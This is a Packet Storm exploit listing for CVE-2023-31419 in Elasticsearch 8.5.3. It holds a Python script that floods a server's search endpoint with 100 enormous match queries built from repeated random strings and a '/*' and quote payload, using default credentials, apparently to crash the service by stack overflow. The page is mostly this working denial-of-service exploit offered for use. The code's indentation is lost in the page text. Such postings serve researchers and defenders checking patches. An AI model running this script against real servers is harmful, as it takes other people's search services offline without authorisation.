Elasticsearch 8.5.3 Stack Overflow ≈ Packet Storm

Home^[1] Files^[2] News^[3] &[SERVICES_TAB] Contact^[4] Add New^[5]

Change Mirror^[12] Download^[13]

        # Exploit Author: TOUHAMI KASBAOUI
# Vendor Homepage: https://elastic.co/
# Version: 8.5.3 / OpenSearch
# Tested on: Ubuntu 20.04 LTS
# CVE : CVE-2023-31419
# Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419
import requests
import random
import string
es_url = 'http://localhost:9200'  # Replace with your Elasticsearch server URL
index_name = '*'
payload = "/*" * 10000 + "\\" +"'" * 999
verify_ssl = False
username = 'elastic'
password = 'changeme'
auth = (username, password)
num_queries = 100
for _ in range(num_queries):
symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))
search_query = {
"query": {
"match": {
"message": (symbols * 9000) + payload
}
}
}
print(f"Query {_ + 1} - Search Query:")
search_endpoint = f'{es_url}/{index_name}/_search'
response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)
if response.status_code == 200:
search_results = response.json()
print(f"Query {_ + 1} - Response:")
print(search_results)
total_hits = search_results['hits']['total']['value']
print(f"Query {_ + 1}: Total hits: {total_hits}")
for hit in search_results['hits']['hits']:
source_data = hit['_source']
print("Payload result: {search_results}")
else:
print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")

• Follow us on Twitter^[16]
• Follow us on Facebook^[17]
• Subscribe to an RSS Feed^[18]

File Tags

• ActiveX^[19] (932)
• Advisory^[20] (82,311)
• Arbitrary^[21] (16,278)
• BBS^[22] (2,859)
• Bypass^[23] (1,755)
• CGI^[24] (1,028)
• Code Execution^[25] (7,318)
• Conference^[26] (680)
• Cracker^[27] (843)
• CSRF^[28] (3,351)
• DoS^[29] (23,567)
• Encryption^[30] (2,371)
• Exploit^[31] (52,126)
• File Inclusion^[32] (4,230)
• File Upload^[33] (977)
• Firewall^[34] (821)
• Info Disclosure^[35] (2,795)
• Intrusion Detection^[36] (894)
• Java^[37] (3,049)
• JavaScript^[38] (860)
• Kernel^[39] (6,748)
• Local^[40] (14,510)
• Magazine^[41] (586)
• Overflow^[42] (12,743)
• Perl^[43] (1,423)
• PHP^[44] (5,155)
• Proof of Concept^[45] (2,345)
• Protocol^[46] (3,613)
• Python^[47] (1,538)
• Remote^[48] (30,890)
• Root^[49] (3,593)
• Rootkit^[50] (513)
• Ruby^[51] (612)
• Scanner^[52] (1,641)
• Security Tool^[53] (7,902)
• Shell^[54] (3,201)
• Shellcode^[55] (1,216)
• Sniffer^[56] (895)
• Spoof^[57] (2,209)
• SQL Injection^[58] (16,418)
• TCP^[59] (2,411)
• Trojan^[60] (687)
• UDP^[61] (894)
• Virus^[62] (666)
• Vulnerability^[63] (31,847)
• Web^[64] (9,711)
• Whitepaper^[65] (3,751)
• x86^[66] (963)
• XSS^[67] (18,003)
• Other^[68]

File Archives

• September 2023^[69]
• August 2023^[70]
• July 2023^[71]
• June 2023^[72]
• May 2023^[73]
• April 2023^[74]
• March 2023^[75]
• February 2023^[76]
• January 2023^[77]
• December 2022^[78]
• November 2022^[79]
• October 2022^[80]
• Older^[81]

Systems

• AIX^[82] (428)
• Apple^[83] (2,009)
• BSD^[84] (374)
• CentOS^[85] (57)
• Cisco^[86] (1,925)
• Debian^[87] (6,842)
• Fedora^[88] (1,692)
• FreeBSD^[89] (1,245)
• Gentoo^[90] (4,329)
• HPUX^[91] (879)
• iOS^[92] (353)
• iPhone^[93] (108)
• IRIX^[94] (220)
• Juniper^[95] (68)
• Linux^[96] (46,811)
• Mac OS X^[97] (687)
• Mandriva^[98] (3,105)
• NetBSD^[99] (256)
• OpenBSD^[100] (485)
• RedHat^[101] (13,916)
• Slackware^[102] (941)
• Solaris^[103] (1,610)
• SUSE^[104] (1,444)
• Ubuntu^[105] (8,938)
• UNIX^[106] (9,313)
• UnixWare^[107] (186)
• Windows^[108] (6,588)
• Other^[109]

© 2022 Packet Storm. All rights reserved.